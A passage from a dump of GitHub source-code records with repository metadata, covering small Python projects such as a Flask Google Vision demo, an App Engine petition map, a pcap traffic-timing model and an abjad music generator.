(approx).\")\r\n","repo_name":"InvisiblePro/Hacktoberfest-2022","sub_path":"Jupyter/Aerial_distance_calculator/Aerial_Distance_Calc.py","file_name":"Aerial_Distance_Calc.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"53"} +{"seq_id":"39892472734","text":"import math\narr = []\nwith open('Problem 99 base_exp.txt') as data:\n for i in data:\n x = i.replace('\\n','').split(',')\n if x != []:\n arr.append(x)\n\n\nres = 0\nfor i in range(1, len(arr)):\n #print(i)\n x = int(arr[res][0])\n x_diff = int(arr[res][1])\n y = int(arr[i][0])\n y_diff = int(arr[i][1])\n\n while (y_diff != x_diff) and (y_diff != 1 and x_diff != 1):\n #print(x_diff, y_diff)\n if x_diff > y_diff:\n x_diff -= y_diff\n y /= x\n else:\n y_diff -= x_diff\n x /= y\n if y > x:\n res = i\n\nprint(res + 1)\n \n","repo_name":"MikhailGusarov/ProjectEuler","sub_path":"Problem 99.py","file_name":"Problem 99.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44182667652","text":"\"\"\"\r\nSeries25. Дано целое число N и набор из N целых чисел, содержащий по\r\nкрайней мере два нуля. Вывести сумму чисел из данного набора, расположенных между первым и последним нулем (если первый и последний\r\nнули идут подряд, то вывести 0).\r\n\"\"\"\r\n\r\nimport random\r\nimport sys\r\n\r\nresultList = list()\r\nzeroList = list()\r\nsumm = 0\r\n\r\nN = int(input(\"Введите число элементов - \"))\r\n\r\nwhile N < 1:\r\n\tN = int(input(\"Введите число элементов - \"))\r\n\r\nfor x in range(0,N):\r\n\tresultList.append(random.randint(0, 3))\r\n\r\nprint(resultList)\r\n\r\ncountZero = resultList.count(0)\r\n\r\nif countZero < 2:\r\n\tprint(\"В сгенерированной последовательности мало нулей. Перезапустите программу!\")\r\n\texit()\r\n\r\nelif countZero == 2:\r\n\r\n\ti = resultList.index(0)\r\n\ti += 1\r\n\r\n\twhile resultList[i] != 0:\r\n\t\tsumm += resultList[i]\r\n\t\ti += 1\r\n\r\nelif countZero > 2:\r\n\r\n\tstart = resultList.index(0)\r\n\r\n\tresultList.reverse()\r\n\tfinish = len(resultList) - resultList.index(0)\r\n\r\n\tresultList.reverse()\r\n\r\n\tinterestList = resultList[start:finish]\r\n\t\r\n\tsumm = sum(interestList)\r\n\r\nprint(\"Сумма между крайними нулями\", summ)\r\n","repo_name":"666sempron999/Abramyan-tasks-","sub_path":"Series(40)/25.py","file_name":"25.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19208236906","text":"from flask import Flask, render_template, request, redirect, make_response, send_file, session, Markup\r\nfrom flask_bootstrap import Bootstrap\r\n\r\nfrom google.cloud import vision\r\nfrom google.cloud import storage\r\nimport os\r\n\r\n\r\nos.environ['GOOGLE_APPLICATION_CREDENTIALS']=r'ServiceAccount_DocumentAI.json' \r\n\r\napp = Flask(__name__)\r\napp.secret_key = \"Sravan_789\" \r\nbootstrap = Bootstrap(app)\r\n\r\n@app.route('/',methods=['GET', 'POST']) \r\ndef g_vision(): \r\n return render_template(\"g_vision.html\") \r\n@app.route('/g_vision1',methods=['GET', 'POST']) \r\ndef g_vision1():\r\n \r\n if request.form.get(\"gv_1\"):\r\n gv_title=\"Label Detection\"\r\n gv_description=\"The Label Detection can detect and extract information about entities in an image, across a broad group of categories. Labels can identify general objects, locations, activities, animal species, products, and more.\"\r\n \r\n elif request.form.get(\"gv_2\"):\r\n gv_title=\"Text Detection\"\r\n gv_description=\"Text Detection detects and extracts text from any image. For example, a photograph might contain a street sign or traffic sign\"\r\n \r\n elif request.form.get(\"gv_3\"):\r\n gv_title=\"Ladmark Detection\"\r\n gv_description=\"Landmark Detection detects popular natural and human-made structures within an image.\"\r\n \r\n elif request.form.get(\"gv_4\"):\r\n gv_title=\"Logo Detection\"\r\n gv_description=\"Logo Detection detects popular product logos within an image\"\r\n \r\n elif request.form.get(\"gv_5\"):\r\n gv_title=\"Safesearch Detection\"\r\n gv_description=\"SafeSearch Detection detects explicit content such as adult content or violent content within an image. This feature uses five categories (adult, spoof, medical, violence, and racy) and returns the likelihood that each is present in a given image.\"\r\n \r\n elif request.form.get(\"gv_6\"):\r\n gv_title=\"Emotion Detection\"\r\n gv_description=\"Emotion Detection detects the emotion of the person in the image. This feature uses four categories (joy, anger, sorrow, and surprise.) and returns the likelihood that each is present in a given image. \"\r\n \r\n elif request.form.get(\"gv_7\"):\r\n gv_title=\"Web Content Detection\"\r\n gv_description=\"Web Content Detection detects Web references to an image.\" \r\n \r\n session['gv_title']=gv_title\r\n session['gv_description']=gv_description\r\n \r\n return render_template(\"g_vision1.html\",gv_title=gv_title,gv_description=gv_description) \r\n\r\n@app.route('/g_vision2',methods=['GET', 'POST']) \r\ndef g_vision2(): \r\n \r\n gv_title=session['gv_title']\r\n gv_description=session['gv_description']\r\n \r\n file = request.files['file'] \r\n filename = file.filename \r\n \r\n os.environ['GOOGLE_APPLICATION_CREDENTIALS']=r'ServiceAccount_DocumentAI.json'\r\n \r\n client1 = storage.Client()\r\n bucket = client1.bucket('sravan_vision')\r\n blob = bucket.blob(filename)\r\n blob.upload_from_file(file)\r\n \r\n image_uri = \"gs://sravan_vision/%s\" % (filename)\r\n client = vision.ImageAnnotatorClient()\r\n image = vision.Image()\r\n image.source.image_uri = image_uri\r\n \r\n if gv_title==\"Label Detection\":\r\n \r\n response1 = client.label_detection(image=image)\r\n l1=[]\r\n for label in response1.label_annotations:\r\n l1.append([label.description, '%.2f%%' % (label.score*100.)])\r\n return render_template(\"g_vision1.html\",l1=l1,gv_title=gv_title,gv_description=gv_description) \r\n\r\n elif gv_title==\"Text Detection\":\r\n \r\n response2 = client.text_detection(image=image)\r\n l2=response2.full_text_annotation.text\r\n return render_template(\"g_vision1.html\",l2=l2,gv_title=gv_title,gv_description=gv_description) \r\n \r\n elif gv_title==\"Ladmark Detection\":\r\n \r\n response3 = client.landmark_detection(image=image)\r\n l3=[]\r\n for landmark in response3.landmark_annotations:\r\n for landmark2 in landmark.locations:\r\n l3.append([landmark.description,landmark2.lat_lng])\r\n return render_template(\"g_vision1.html\",l3=l3,gv_title=gv_title,gv_description=gv_description) \r\n \r\n elif gv_title==\"Logo Detection\":\r\n \r\n response4 = client.logo_detection(image=image)\r\n l4=[]\r\n for logo in response4.logo_annotations:\r\n l4.append([logo.description,'%.2f%%' % (logo.score*100.)])\r\n return render_template(\"g_vision1.html\",l4=l4,gv_title=gv_title,gv_description=gv_description) \r\n \r\n elif gv_title==\"Safesearch Detection\":\r\n \r\n response5 = client.safe_search_detection(image=image)\r\n safe = response5.safe_search_annotation\r\n \r\n likelihood_name = ('UNKNOWN', 'VERY_UNLIKELY', 'UNLIKELY', 'POSSIBLE',\r\n 'LIKELY', 'VERY_LIKELY')\r\n l5 = {'Adult': format(likelihood_name[safe.adult]),\r\n 'Medical': format(likelihood_name[safe.medical]),\r\n 'Spoofed': format(likelihood_name[safe.spoof]),\r\n 'Violence': format(likelihood_name[safe.violence]),\r\n 'Racy': format(likelihood_name[safe.racy])\r\n }\r\n return render_template(\"g_vision1.html\",l5=l5,gv_title=gv_title,gv_description=gv_description) \r\n \r\n elif gv_title==\"Emotion Detection\":\r\n \r\n response6 = client.face_detection(image=image)\r\n likelihood_name = ('UNKNOWN', 'VERY_UNLIKELY', 'UNLIKELY', 'POSSIBLE',\r\n 'LIKELY', 'VERY_LIKELY')\r\n for face in response6.face_annotations:\r\n l6 = {'Anger': format(likelihood_name[face.anger_likelihood]),\r\n 'Joy': format(likelihood_name[face.joy_likelihood]),\r\n 'Surprise': format(likelihood_name[face.surprise_likelihood]), \r\n 'Sorrow': format(likelihood_name[face.sorrow_likelihood])\r\n }\r\n return render_template(\"g_vision1.html\",l6=l6,gv_title=gv_title,gv_description=gv_description) \r\n \r\n elif gv_title==\"Web Content Detection\":\r\n \r\n response7 = client.web_detection(image=image)\r\n annotations = response7.web_detection\r\n l7=[]\r\n \r\n if annotations.best_guess_labels:\r\n for label in annotations.best_guess_labels:\r\n l7.append('\\nBest guess label: {}'.format(label.label))\r\n \r\n if annotations.pages_with_matching_images:\r\n l7.append('\\n{} Pages with matching images found:'.format(\r\n len(annotations.pages_with_matching_images)))\r\n \r\n for page in annotations.pages_with_matching_images:\r\n l7.append(format(page.url))\r\n \r\n return render_template(\"g_vision1.html\",l7=l7,gv_title=gv_title,gv_description=gv_description) \r\n \r\n \r\nif __name__ == '__main__':\r\n #app.run(port=5000,debug=True)\r\n app.run(host='192.168.1.233',port=9898)","repo_name":"vipvivek15/AI-Internship-Projects","sub_path":"g_vision.py","file_name":"g_vision.py","file_ext":"py","file_size_in_byte":6974,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"22471475803","text":"import cgi\nimport os\n\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp.util import run_wsgi_app\nfrom google.appengine.ext.webapp import template\nfrom google.appengine.ext.webapp import template\nfrom google.appengine.ext import db\nfrom google.appengine.api import memcache\n\nfrom django.utils import simplejson\n\nimport models\nimport geocoder\nimport geodata\n\nMEMCACHE_MAXPOSTCODES = 'maxpostcode'\nMEMCACHE_STATECLUSTER = 'statecluster_'\n\nclass MainPage(webapp.RequestHandler):\n def get(self):\n template_values = {}\n path = os.path.join(os.path.dirname(__file__), 'templates/main.html')\n self.response.out.write(template.render(path, template_values))\n\nclass FormPage(webapp.RequestHandler):\n def get(self):\n template_values = {}\n path = os.path.join(os.path.dirname(__file__), 'templates/form.html')\n self.response.out.write(template.render(path, template_values))\n\nclass MapPage(webapp.RequestHandler):\n def get(self):\n template_values = {}\n path = os.path.join(os.path.dirname(__file__), 'templates/map.html')\n self.response.out.write(template.render(path, template_values))\n\nclass Guestbook(webapp.RequestHandler):\n def post(self):\n signer = models.PetitionSigner()\n signer.firstname = self.request.get('firstname')\n signer.lastname = self.request.get('lastname')\n signer.streetinfo = self.request.get('streetinfo')\n signer.city = self.request.get('city')\n signer.state = self.request.get('state')\n signer.postcode = int(self.request.get('postcode'))\n latlng = geocoder.geocodeAddress(signer.streetinfo + \" \" + signer.city + \" \" + signer.state + \" \" + str(signer.postcode))\n if latlng is not None:\n signer.latlng = latlng\n signer.put()\n clusterdata = {'lastname': signer.lastname,\n 'streetinfo': signer.streetinfo,\n 'city': signer.city,\n 'state': signer.state,\n 'postcode': signer.postcode,\n 'lat': latlng.lat,\n 'lng': latlng.lon}\n\n query = db.Query(models.RegionCluster)\n query.filter('type =', 'postcode')\n query.filter('name =', str(signer.postcode))\n result = query.get()\n if result is None:\n postcodecluster = models.RegionCluster()\n postcodecluster.type = 'postcode'\n postcodecluster.name = str(signer.postcode)\n postcodecluster.state = signer.state\n postcodecluster.data = simplejson.dumps([clusterdata])\n postcodecluster.count = 1\n latlng = geocoder.geocodeAddress(str(signer.postcode) + \",AU\")\n if latlng is not None:\n postcodecluster.latlng = latlng\n postcodecluster.put()\n else:\n postcodecluster = result\n postcodecluster.count = postcodecluster.count + 1\n data = simplejson.loads(postcodecluster.data)\n data.append(clusterdata)\n postcodecluster.data = simplejson.dumps(data)\n postcodecluster.put()\n\n # Remember the max number of addresses in a postcode, useful for clustering\n maxpostcodes = memcache.get(MEMCACHE_MAXPOSTCODES)\n if maxpostcodes is not None:\n if int(maxpostcodes) < postcodecluster.count:\n memcache.set(MEMCACHE_MAXPOSTCODES, str(postcodecluster.count))\n else:\n findMaxInPostcodes()\n memcache.delete(MEMCACHE_STATECLUSTER + signer.state)\n self.redirect('/map?postcode=' + str(signer.postcode) + '&state=' + signer.state)\n\ndef findMaxInPostcodes():\n query = db.Query(models.RegionCluster)\n query.filter('type =', 'postcode')\n query.order('-count')\n result = query.get()\n memcache.set(MEMCACHE_MAXPOSTCODES, str(result.count))\n return result.count\n\nclass Setup(webapp.RequestHandler):\n def post(self):\n for state in geodata.states:\n statecluster = RegionCluster()\n statecluster.type = 'state'\n statecluster.name = state.name\n statecluster.data = '[]'\n statecluster.count = 0\n statecluster.latlng = GeoPt(state.lat, state.lng)\n statecluster.put()\n self.response.out.write('Added all the states')\n\nclass ClusterGenerator(webapp.RequestHandler):\n def get(self):\n data = {}\n data['states'] = {}\n maxpostcodes = memcache.get(MEMCACHE_MAXPOSTCODES)\n if maxpostcodes is None:\n maxpostcodes = findMaxInPostcodes()\n data['maxpostcodes'] = int(maxpostcodes)\n\n for state in geodata.states:\n statedataString = memcache.get(MEMCACHE_STATECLUSTER + state['name'])\n if statedataString is None:\n query = db.Query(models.RegionCluster)\n query.filter('type =', 'postcode')\n query.filter('state =', state['name'])\n results = query.fetch(1000)\n statedata = {}\n statedata['lat'] = state['lat']\n statedata['lng'] = state['lng']\n statedata['count'] = len(results)\n statedata['postcodes'] = []\n for result in results:\n statedata['postcodes'].append(simplejson.loads(result.data))\n memcache.set(MEMCACHE_STATECLUSTER + state['name'], simplejson.dumps(statedata))\n else:\n statedata = simplejson.loads(statedataString)\n data['states'][state['name']] = statedata\n self.response.out.write(simplejson.dumps(data))\n\n\napplication = webapp.WSGIApplication(\n [\n ('/', MainPage),\n ('/signup', FormPage),\n ('/map', MapPage),\n ('/setup', Setup),\n ('/getclusters', ClusterGenerator),\n ('/sendform', Guestbook)],\n debug=True)\n\ndef main():\n run_wsgi_app(application)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"fredsa/pamelafox-samplecode","sub_path":"ygg/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70062433","text":"#coding=utf-8\r\n\r\n#WlAN网卡名字'Intel(R) Dual Band Wireless-AC 7265'\r\n\r\nimport sys\r\nfrom PyQt5.QtWidgets import QApplication,QMainWindow\r\nfrom Yiitao_Scan_ui import *\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n mainWindow = QMainWindow()\r\n\r\n ui = Ui_MainWindow()\r\n ui.setupUi(mainWindow)\r\n mainWindow.show()\r\n sys.exit(app.exec_())","repo_name":"Miracle778/My_PyQT_Lab","sub_path":"Scan/Yiitao_Scan.py","file_name":"Yiitao_Scan.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"71609978728","text":"#external libraries\nimport numpy as np\n\n#internal libraries\nfrom classes.node import Node\n\nclass Pipe():\n '''\n Generic class for any kind of pipe.\n\n Arguments:\n - indx: Index of the element. If two pipes have the same indx, they'reconsidered as parallel. \n - ni: Node object of the first point of the Pipe.\n - nf: Node object of the second point of the Pipe.\n - d: List containing the diameter and its units [value, 'units'] [m].\n - Supported units: 'in', 'mm', 'm'\n - l: Length of the Pipe [m]\n '''\n def __init__(self, indx: int,\n ni: Node,\n nf: Node,\n d: list,\n l: float,\n c: float = 0) -> None:\n #primary attributes\n self.indx = indx;\n self.ni = ni;\n self.nf = nf;\n #properties\n self.d = self.verifyUnits(d);\n self.l = l;\n self.c = c;\n self.q = 0;\n #status attributes\n self.isParallel = False;\n pass\n\n def verifyUnits(self, list: list):\n if list[1].lower() == 'in':\n return list[0]*0.0254\n elif list[1].lower() == 'mm':\n return list[0]/1000\n elif list[1].lower() == 'm':\n return list[0]\n else:\n raise ValueError(f'Unsupported units for Pipe {self.indx}.')\n\n def addParallel(self, d: list,\n l: float):\n self.d.append(self.verifyUnits(d))\n self.l.append(l)\n","repo_name":"bacaxnot/cevil","sub_path":"aqueductnator/classes/pipe.py","file_name":"pipe.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28907386984","text":"from reptile import Reptile\n\nclass Snake(Reptile):\n def __init__(self):\n\n super().__init__()\n self.forked_tongue = True\n self.venom = True\n self.limbs = False\n\n def use_tongue_to_smell(self):\n return \"taste to smell, smell to taste\"\n\n\nif __name__ == \"__main__\":\n steve = Snake()\n print(steve.breathe())\n print(steve.cold_blooded)\n print(steve.use_tongue_to_smell())","repo_name":"ldaijiw/python_oop","sub_path":"snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35158944297","text":"def solution(babbling):\n answer = 0\n can = [\"aya\",\"ye\",\"woo\",\"ma\"]\n cant = [\"ayaaya\",\"yeye\",\"woowoo\",\"mama\"]\n \n for i in range(len(babbling)):\n flag= False\n for word in cant: # 연속해서 같은 발음 체크 \n if word in babbling[i]:\n flag = True\n continue\n if flag == False: # 아니면 \n if babbling[i] in can: # 한 단어 일치\n answer += 1\n else: # 여러 단어 합쳐진\n for c in can:\n babbling[i] = babbling[i].replace(c,\"_\")\n k = babbling[i].replace(\"_\",\"\")\n if k ==\"\":\n answer+=1\n\n return answer","repo_name":"yooooonzzzzzang/Algo_seed","sub_path":"프로그래머스/unrated/133499. 옹알이 (2)/옹알이 (2).py","file_name":"옹알이 (2).py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39512752269","text":"import datetime\nfrom typing import Dict, List\n\nfrom django.core.exceptions import ValidationError\nfrom django.db.utils import IntegrityError\n\nfrom posthog.models.dashboard import Dashboard\nfrom posthog.models.dashboard_tile import (\n DashboardTile,\n Text,\n get_tiles_ordered_by_position,\n)\nfrom posthog.models.exported_asset import ExportedAsset\nfrom posthog.models.insight import Insight\nfrom posthog.test.base import APIBaseTest\nfrom posthog.test.db_context_capturing import capture_db_queries\n\n\nclass TestDashboardTileModel(APIBaseTest):\n dashboard: Dashboard\n asset: ExportedAsset\n tiles: List[DashboardTile]\n\n def setUp(self) -> None:\n self.dashboard = Dashboard.objects.create(team=self.team, name=\"private dashboard\", created_by=self.user)\n for i in range(10):\n if i > 6:\n text = Text.objects.create(team=self.team, body=f\"text-{i}\")\n DashboardTile.objects.create(dashboard=self.dashboard, text=text)\n else:\n insight = Insight.objects.create(team=self.team, short_id=f\"123456-{i}\", name=f\"insight-{i}\")\n DashboardTile.objects.create(dashboard=self.dashboard, insight=insight)\n\n def test_loads_dashboard_tiles_efficiently(self) -> None:\n with capture_db_queries() as capture_query_context:\n tiles = get_tiles_ordered_by_position(dashboard=self.dashboard)\n\n for tile in tiles:\n assert tile.insight or tile.text\n\n assert len(tiles) == 10\n\n assert len(capture_query_context.captured_queries) == 1\n\n def test_loads_dashboard_tiles_excludes_deleted(self) -> None:\n tiles = get_tiles_ordered_by_position(dashboard=self.dashboard)\n assert len(tiles) == 10\n\n tiles[0].deleted = True\n tiles[0].save()\n\n insight = Insight.objects.get(team=self.team, short_id=\"123456-1\")\n insight.deleted = True\n insight.save()\n\n tiles = get_tiles_ordered_by_position(dashboard=self.dashboard)\n assert len(tiles) == 8\n\n def test_cannot_add_a_tile_with_insight_and_text_on_validation(self) -> None:\n insight = Insight.objects.create(team=self.team, short_id=\"123456\", name=\"My Test subscription\")\n text = Text.objects.create(team=self.team, body=\"I am a text\")\n\n with self.assertRaises(IntegrityError):\n DashboardTile.objects.create(dashboard=self.dashboard, insight=insight, text=text)\n\n def test_cannot_set_caching_data_for_text_tiles(self) -> None:\n tile_fields: List[Dict] = [\n {\"filters_hash\": \"123\"},\n {\"refreshing\": True},\n {\"refresh_attempt\": 2},\n {\"last_refresh\": datetime.datetime.now()},\n ]\n for invalid_text_tile_field in tile_fields:\n with self.subTest(option=invalid_text_tile_field):\n with self.assertRaises(ValidationError):\n text = Text.objects.create(team=self.team, body=\"I am a text\")\n tile = DashboardTile.objects.create(dashboard=self.dashboard, text=text, **invalid_text_tile_field)\n tile.clean()\n","repo_name":"PostHog/posthog","sub_path":"posthog/models/test/test_dashboard_tile_model.py","file_name":"test_dashboard_tile_model.py","file_ext":"py","file_size_in_byte":3132,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"5476852084","text":"# Author : Patrik Nemeth (xnemet04)\n# Email : xnemet04@stud.fit.vutbr.cz\n\nimport argparse\nfrom cgitb import small\nimport numpy as np\nimport pickle\nimport sys\n\nfrom lib import *\n\n#-#-#-#-#-#-#-#-#-#-#\n # MAIN #\n #-#-#-#-#-#-#-#-#-#-#\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-s', nargs=1, help=\"parse an input pcap file and output 2 csv files with time data split between master / slave\")\nparser.add_argument('-a', nargs=2, help=\"analyze and generate a model based on 2 input csv files in the order master slave\")\nargs = parser.parse_args()\n\nif len(sys.argv) < 2:\n print(\"Program requires exactly one option.\")\n parser.print_help()\n exit(1)\n\nif args.s:\n save_csv_data(args.s[0], \"master.csv\", \"slave.csv\")\n exit(0)\n\n\nmaster = {}\nslave = {}\n\n###### ######\n# Get the times of packets relative to the start of the communication\nmaster['times'], slave['times'] = load_csv_data(args.a[0], args.a[1], 0.66)\n\n###### ######\n# Get 5 minute windows\nwindow_in_minutes = 5\nwindow_in_seconds = window_in_minutes * 60\n\n# Master windows\ncnt = 1\nmaster['windows'] = [[]]\nfor t in master['times']:\n if t <= cnt * window_in_seconds:\n master['windows'][cnt-1].append(t)\n else:\n cnt += 1\n master['windows'].append([])\n# Slave windows\ncnt = 1\nslave['windows'] = [[]]\nfor t in slave['times']:\n if t <= cnt * window_in_seconds:\n slave['windows'][cnt-1].append(t)\n else:\n cnt += 1\n slave['windows'].append([])\n\n###### ######\n# Get time deltas and window sizes\nmaster['deltas'] = time_deltas(master['times'])\nmaster['window_sizes'] = window_sizes(master['windows'])\n\nslave['deltas'] = time_deltas(slave['times'])\nslave['window_sizes'] = window_sizes(slave['windows'])\n\n###### ######\n# Split deltas to window sizes\nmaster['deltas_windowed'] = split_deltas_by_window_sizes(master['deltas'], master['window_sizes'])\nslave['deltas_windowed'] = split_deltas_by_window_sizes(slave['deltas'], slave['window_sizes'])\n\nprint(\"all data windowed...\")\n\n###### ######\n# Get characteristics\nmaster['q1'], master['q2'], master['q3'] = np.quantile(master['deltas'], [0.25, 0.5, 0.75])\nmaster['mean'] = np.mean(master['deltas'])\n\nslave['q1'], slave['q2'], slave['q3'] = np.quantile(slave['deltas'], [0.25, 0.5, 0.75])\nslave['mean'] = np.mean(slave['deltas'])\n\n###### ######\n# Get number of packets per window for split points\nmaster['q1_sizes'] = size_characteristics_for_split_point(master['deltas_windowed'], master['q1'])\nmaster['q2_sizes'] = size_characteristics_for_split_point(master['deltas_windowed'], master['q2'])\nmaster['q3_sizes'] = size_characteristics_for_split_point(master['deltas_windowed'], master['q3'])\nmaster['mean_sizes'] = size_characteristics_for_split_point(master['deltas_windowed'], master['mean'])\nslave['q1_sizes'] = size_characteristics_for_split_point(slave['deltas_windowed'], slave['q1'])\nslave['q2_sizes'] = size_characteristics_for_split_point(slave['deltas_windowed'], slave['q2'])\nslave['q3_sizes'] = size_characteristics_for_split_point(slave['deltas_windowed'], slave['q3'])\nslave['mean_sizes'] = size_characteristics_for_split_point(slave['deltas_windowed'], slave['mean'])\n\n###### ######\n# Get the best split point\nmaster['split_point'] = choose_best_split_point(\n master['q1_sizes'], master['q1'],\n master['q2_sizes'], master['q2'],\n master['q3_sizes'], master['q3'],\n master['mean_sizes'], master['mean']\n )\nslave['split_point'] = choose_best_split_point(\n slave['q1_sizes'], slave['q1'],\n slave['q2_sizes'], slave['q2'],\n slave['q3_sizes'], slave['q3'],\n slave['mean_sizes'], slave['mean']\n )\n\n###### ######\n# Get number of packets per window for the chosen best split point\nmaster['best_split_sizes'] = size_characteristics_for_split_point(master['deltas_windowed'], master['split_point'])\nslave['best_split_sizes'] = size_characteristics_for_split_point(slave['deltas_windowed'], slave['split_point'])\n\n###### ######\n# Get the final 4-tuple, that describes the analyzed communication\nmaster_all = {}\nmaster_lt_split = {}\nmaster_geq_split = {}\n\nslave_all = {}\nslave_lt_split = {}\nslave_geq_split = {}\n\nmaster_all['mean'] = np.mean(master['best_split_sizes']['all'])\nmaster_all['std'] = np.std(master['best_split_sizes']['all'])\nmaster_lt_split['mean'] = np.mean(master['best_split_sizes']['lt_split'])\nmaster_lt_split['std'] = np.std(master['best_split_sizes']['lt_split'])\nmaster_geq_split['mean'] = np.mean(master['best_split_sizes']['geq_split'])\nmaster_geq_split['std'] = np.std(master['best_split_sizes']['geq_split'])\n\nslave_all['mean'] = np.mean(slave['best_split_sizes']['all'])\nslave_all['std'] = np.std(slave['best_split_sizes']['all'])\nslave_lt_split['mean'] = np.mean(slave['best_split_sizes']['lt_split'])\nslave_lt_split['std'] = np.std(slave['best_split_sizes']['lt_split'])\nslave_geq_split['mean'] = np.mean(slave['best_split_sizes']['geq_split'])\nslave_geq_split['std'] = np.std(slave['best_split_sizes']['geq_split'])\n\nmaster_final_tuple = (\n master['split_point'],\n (master_all['mean'] - 3 * master_all['std'], master_all['mean'] + 3 * master_all['std']),\n (master_lt_split['mean'] - 3 * master_lt_split['std'], master_lt_split['mean'] + 3 * master_lt_split['std']),\n (master_geq_split['mean'] - 3 * master_geq_split['std'], master_geq_split['mean'] + 3 * master_geq_split['std'])\n)\n\nslave_final_tuple = (\n slave['split_point'],\n (slave_all['mean'] - 3 * slave_all['std'], slave_all['mean'] + 3 * slave_all['std']),\n (slave_lt_split['mean'] - 3 * slave_lt_split['std'], slave_lt_split['mean'] + 3 * slave_lt_split['std']),\n (slave_geq_split['mean'] - 3 * slave_geq_split['std'], slave_geq_split['mean'] + 3 * slave_geq_split['std'])\n)\n\nwith open(\"master_model.pkl\", \"wb\") as f:\n pickle.dump(master_final_tuple, f)\n\nwith open(\"slave_model.pkl\", \"wb\") as f:\n pickle.dump(slave_final_tuple, f)\n\nplot(\n master['best_split_sizes']['all'],\n master['best_split_sizes']['lt_split'],\n master['best_split_sizes']['geq_split'],\n master_final_tuple,\n #\"from-master\"\n )\nplt.show()\nplt.clf()\nplot(\n slave['best_split_sizes']['all'],\n slave['best_split_sizes']['lt_split'],\n slave['best_split_sizes']['geq_split'],\n slave_final_tuple,\n #\"to-master\"\n )\nplt.show()\n","repo_name":"pemeth/pds-project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41512455298","text":"import _settings\nfrom abjad import *\nfrom calliope.bubbles import *\nfrom calliope.material import *\n\nclass GenLine(Line):\n gen_pitches = (\n ( 2, 0,-1),\n (-5,-3,-1),\n (-5, 0,-3),\n ( 0,-3,-1),\n )\n division_masks = None\n gen_rhythms = (\n (2,2,1), # forward or backword, and the 1 can be extended if at the end/beginning of a longer phrase\n (4,4,1), # forward or backword, and the 1 can be extended if at the end/beginning of a longer phrase\n (4,4,4),\n )\n harmonic_intervals = (7,)\n drone_pitch=-10\n\n pitch_sequence = (0,)\n rhythm_sequence = (0,)\n pitch_directions=(1,)\n rhythm_directions=(1,)\n rhythm_multiplies=(1,)\n octaves = (0,)\n transpose=0\n\n gen_pitch = ()\n gen_rhythm = ()\n duration_meter = ((1,2),)*9\n\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n \n self.gen_pitch = []\n for i,s in enumerate(self.pitch_sequence):\n self.gen_pitch += self.gen_pitches[s % len(self.gen_pitches)][ ::self.pitch_directions[i % len(self.pitch_directions)] ]\n\n self.gen_pitch = [ p + self.transpose + self.octaves[i % len(self.octaves)]*12 for i,p in enumerate(self.gen_pitch) ]\n\n\n self.gen_rhythm = []\n for i,s in enumerate(self.rhythm_sequence):\n self.gen_rhythm_append = self.gen_rhythms[s % len(self.gen_rhythms)][ ::self.rhythm_directions[i % len(self.rhythm_directions)] ]\n self.gen_rhythm_append_multiply = self.rhythm_multiplies[i % len(self.rhythm_multiplies)]\n if self.gen_rhythm_append_multiply != 1:\n self.gen_rhythm_append = [r * self.gen_rhythm_append_multiply for r in self.gen_rhythm_append]\n self.gen_rhythm += self.gen_rhythm_append\n\n def music(self, **kwargs):\n # my_music = self.container_type()\n # print(self.gen_rhythm)\n # tie_specifier = rhythmmakertools.TieSpecifier(tie_across_divisions=[True, False, False, True])\n\n # TO DO... better rhythm generation here...\n\n if self.gen_rhythm:\n durations = [Duration( (1,d) ) for d in self.gen_rhythm] \n print(durations)\n rhythm_maker = rhythmmakertools.NoteRhythmMaker(\n # tie_specifier=tie_specifier\n )\n rhythm = rhythm_maker(durations)\n logical_ties = select(rhythm).by_logical_tie(pitched=True)\n for i, logical_tie in enumerate(logical_ties):\n for note in logical_tie:\n note.written_pitch = self.gen_pitch[i % len(self.gen_pitch) ]\n my_music = self.container_type(rhythm)\n else:\n my_music = self.container_type()\n return my_music\n\nclass GenBubble(Bubble):\n\n # this checks for pitch swapping... move to Bubble for use in other works?\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n if getattr(self, \"swap_pitches\", None):\n p0 = getattr(self, self.swap_pitches[0]).gen_pitch\n p1 = getattr(self, self.swap_pitches[1]).gen_pitch\n for i in self.swap_pitches[2]:\n (p0[i], p1[i]) = (p1[i], p0[i])\n\n\n# def get_gen_rhythms_line(*args, **kwargs):\n# return Line(\" \".join( get_gen_rhythms(*args, **kwargs) ))\n\n\n\nclass In3Time(Line):\n time_signature = Line( commands=( (\"time 3/4\", \"before\"), ) )\n\nclass PhraseA(GenLine):\n pitch_sequence=(0,1) \n rhythm_sequence=(0,0) \n rhythm_multiplies=(4,2)\n\nclass PhraseB(PhraseA):\n 